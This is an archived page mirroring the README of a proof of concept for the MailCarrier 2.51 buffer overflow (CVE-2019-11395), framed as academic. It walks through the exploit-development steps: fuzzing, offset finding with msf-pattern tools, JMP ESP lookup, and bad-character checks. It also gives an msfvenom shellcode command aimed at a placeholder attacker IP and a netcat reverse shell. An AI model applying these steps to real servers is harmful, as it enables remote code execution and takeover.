Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-11395 PoC — Taps Lab MailCarrier 缓冲区错误漏洞

Source
https://github.com/RafaelBicas/CVE-2019-11395
Associated Vulnerability
Title:Taps Lab MailCarrier 缓冲区错误漏洞 (CVE-2019-11395)
Description:Taps Lab MailCarrier是韩国Taps Lab公司的一款基于Windows Server平台的邮件服务器。该产品支持SMTP、POP3和IMAP等协议。 Taps Lab MailCarrier 2.51版本中存在缓冲区溢出漏洞。该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。
Description
Proof of concept with the academic purpose to understand the Buffer Overflow vulnerability using as background the CVE-2019-11395
Readme
# CVE-2019-11395

## Overview

This Proof of Concept (PoC) demonstrates a **Buffer Overflow vulnerability** in MailCarrier 2.51, allowing remote attackers to execute arbitrary code via a long string. The vulnerability can be exploited using the following processes:

- `SMTP RCPT TO`
- `POP3 USER`
- `POP3 LIST`
- `POP3 TOP`
- `POP3 RETR`

The project aims to provide an **academic approach** to understanding how Buffer Overflow works.

---

## ⚠️ Warnings

Before running any tests, **never use your production environment** for initial experimentation. Instead, create a **lab setup** similar to your production environment to **avoid any issues or unintended consequences**.

---

## 🔧 Preparation

### 1. Discover the Vulnerability
- Use the **fuzzing technique** to determine the approximate number of bytes required to break the application.

### 2. Find the Offset
- Once the crash occurs, use:
  ```bash
  msf-pattern_create -l <number_of_bytes>

This helps determine the Offset, which is the exact number of bytes needed to overwrite the `EIP`.
- Use the following command to confirm the Offset
  ```bash
  msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
This identifies the exact byte count required to control the `EIP`.

### 3. Find a JMP or CALL Instruction
- Locate an instruction using:
  ```bash
  JMP ESP
  CALL ESP
We will use this address to redirect execution. Be cautious with ASLR, SafeSEH, or other protection mechanisms.

### 4. Identify bad chars
- Use the Mona tool within Immunity Debugger to check for bad characters.

### 5. Generate Shellcode
- Create shellcode while excluding bad characters:
  ```bash
  msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python

### 6. Add NOPs
- Insert `NOP` (`\x90`) instructions into the payload to improve stability.

### 7. Establish a connection
- Use `netcat` (`nc`) to create a reverse shell and connect to the target.
File Snapshot

 [4.0K]  /data/pocs/22cc003a05711006acc239c62d87e71a7f14db62
├── [ 891]  CVE–2019–11395.py
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.